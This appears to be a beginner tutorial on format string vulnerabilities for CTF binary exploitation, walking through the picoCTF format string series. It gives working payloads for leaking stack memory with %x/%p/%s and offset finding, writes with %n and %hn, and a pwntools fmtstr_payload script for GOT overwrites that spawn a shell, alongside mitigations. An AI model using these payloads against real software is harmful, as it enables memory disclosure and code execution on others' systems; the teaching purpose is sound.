April 12, 2026

Format String Vulnerabilities for CTF Binary Exploitation

A beginner-friendly guide to format string vulnerabilities in CTF binary exploitation: how printf leaks memory, finding the format string offset, writing arbitrary values with %n, and walking through the picoCTF format string series.

Introduction

A format string vulnerability occurs when a C program passes user-controlled input directly as the first argument to printf or a related function. Instead of treating the input as data to print, printf interprets it as a format string and acts on any % specifiers it contains. An attacker can use this to read arbitrary memory and, in some cases, write to any address in the process.

This vulnerability class is at the heart of the picoCTF format string series: format string 0, format string 1, format string 2, and format string 3. Each challenge adds one more concept. Work through them in order.

How printf works

The printf family of functions reads a format string and consumes additional arguments from the call stack to fill in each format specifier. When called correctly it looks like this:

printf("%s scored %d points", username, score);
// The format string is a string literal, not user input.

The vulnerable version passes user input as the format string:

char buf[256];
fgets(buf, sizeof(buf), stdin);
printf(buf); // BUG: buf is user-controlled

When printf encounters %s in the format string it looks on the stack for the next argument (a pointer to a string) and dereferences it. If the caller never provided that argument, printf reads whatever happens to be on the stack at that position, which is attacker-readable process memory.

Note: The vulnerability requires that the attacker controls the format string. If printf("%s", buf) is used instead, the input is always treated as a plain string and no specifiers are interpreted.

Reading memory with %x and %s

Send %x specifiers to dump stack values as hex integers. Each %x consumes one word from the stack:

$ echo '%x %x %x %x %x %x %x %x' | ./vulnerable
f7f9e580 0 0 0 f7f5a700 61616161 25207825 78252078

Use %p instead of %x to get pointer-width output with a 0x prefix, which is cleaner on 64-bit systems:

$ echo '%p %p %p %p %p %p' | ./vulnerable

If you want to read from a specific stack offset without cycling through all the preceding ones, use the positional argument syntax %N$x where N is the index:

$ echo '%6$x' | ./vulnerable # read the 6th stack word
$ echo '%6$p' | ./vulnerable # same, as a pointer

To dereference a pointer on the stack and read the string it points to, use %s:

$ echo '%6$s' | ./vulnerable # dereference the 6th stack word as a string
Warning: %s will crash the program if the value at the target position is not a valid readable pointer. Use %x or %p first to identify which positions hold addresses, then dereference specific ones.

Finding the format string offset

The key skill in format string exploitation is finding the offset at which your own input appears on the stack. Once you know it, you can place an address in the input and use %N$s to dereference it, or %N$n to write to it.

The technique is to start the input with a recognizable marker like AAAA (hex value 0x41414141) and then scan the stack output for that value:

$ echo 'AAAA %x %x %x %x %x %x %x %x %x %x' | ./vulnerable
AAAA f7f9e580 0 0 0 f7f5a700 41414141 25207825 ...
# ^^^^^^^^
# This is our AAAA, at position 6

In the example above, our marker appears at the 6th position. We can confirm this with:

$ echo 'AAAA %6$x' | ./vulnerable
AAAA 41414141 # confirmed: offset is 6

On 64-bit systems, use 8-byte markers (e.g. AAAAAAAA, hex 0x4141414141414141) and look for them in the %p output.

Writing with %n

The %n specifier writes the number of bytes printed so far into the pointer argument it consumes. This turns a read vulnerability into an arbitrary write. If you can place a target address at a known stack offset, %N$n will write to it.

The value written equals the number of characters already output by printf. Use width padding to control it. For example, to write the value 100 (0x64):

# Pad to exactly 100 characters before %n
# The target address is at stack offset 6
printf '%100c%6$n'

To write larger values (like a function address), use %hn (write 2 bytes) or split the write into multiple partial writes, one 2-byte chunk at a time. This is the basis of the GOT (Global Offset Table) overwrite technique used in format string 3.

Tip: Use checksec (part of pwntools) to check whether the binary has RELRO. Full RELRO makes the GOT read-only after dynamic linking, preventing GOT overwrites. Partial RELRO (the default) leaves it writable.

Automating with pwntools

pwntools is a Python library for writing exploit scripts. It handles process I/O, socket connections, and format string payload generation:

pip install pwntools
from pwn import *
# Connect to a local process or remote server
p = process('./vulnerable')
# p = remote('challenge.picoctf.org', 12345)
# Send a format string to leak stack values
p.sendline(b'%p %p %p %p %p %p')
leak = p.recvline()
print(leak)
# Build a format string payload that writes target_value to target_addr
# offset = the stack index where your buffer appears
payload = fmtstr_payload(offset, {target_addr: target_value})
p.sendline(payload)
p.interactive()

The fmtstr_payload function from pwntools builds the entire payload for you, handling the address placement, padding arithmetic, and split writes needed to overwrite arbitrary memory. The only inputs you need are the stack offset and a dictionary of address: value pairs to write.

The picoCTF format string series

Introduces the bug conceptually. A buffer overflow of a format string crashes the program in the right way to print the flag. No memory reading required.

Read a secret value off the stack using %x specifiers. Practice scanning for a recognizable pattern in the leak output.

Overwrite a specific variable in memory using %n. Introduces the concept of writing to a known address by placing it in the input buffer.

Full GOT overwrite. Redirect a library function pointer to system so that the next call to the original function instead spawns a shell.

Mitigations

Modern compilers and operating systems include several defenses against format string exploits:

  • -Wformat-security: GCC warns when printf is called with a non-literal format string. Enabled in most production builds.
  • Full RELRO: marks the GOT read-only after dynamic linking, preventing GOT overwrites.
  • ASLR: randomizes where the stack and libraries are loaded, making it harder to hardcode target addresses. Must be combined with an address leak step.
  • Stack canaries: detect adjacent buffer overflows but do not directly mitigate format string writes.
Tip: Run checksec ./binary (pwntools) to see which mitigations are active on a CTF binary. Partial RELRO with no PIE is the classic easy-mode setup; Full RELRO with PIE and ASLR requires leaking an address before writing.

Quick reference

SpecifierEffect
%xPrint the next stack word as hex
%pPrint the next stack word as a pointer (0x...)
%sDereference the next stack word as a string pointer
%nWrite the bytes-printed count to the next stack pointer
%hnWrite 2 bytes (short) instead of 4
%hhnWrite 1 byte
%N$xPrint the Nth stack word (1-indexed) as hex
%NcPrint N space characters (controls write value for %n)
fmtstr_payload(off, {addr: val})pwntools: build a complete write payload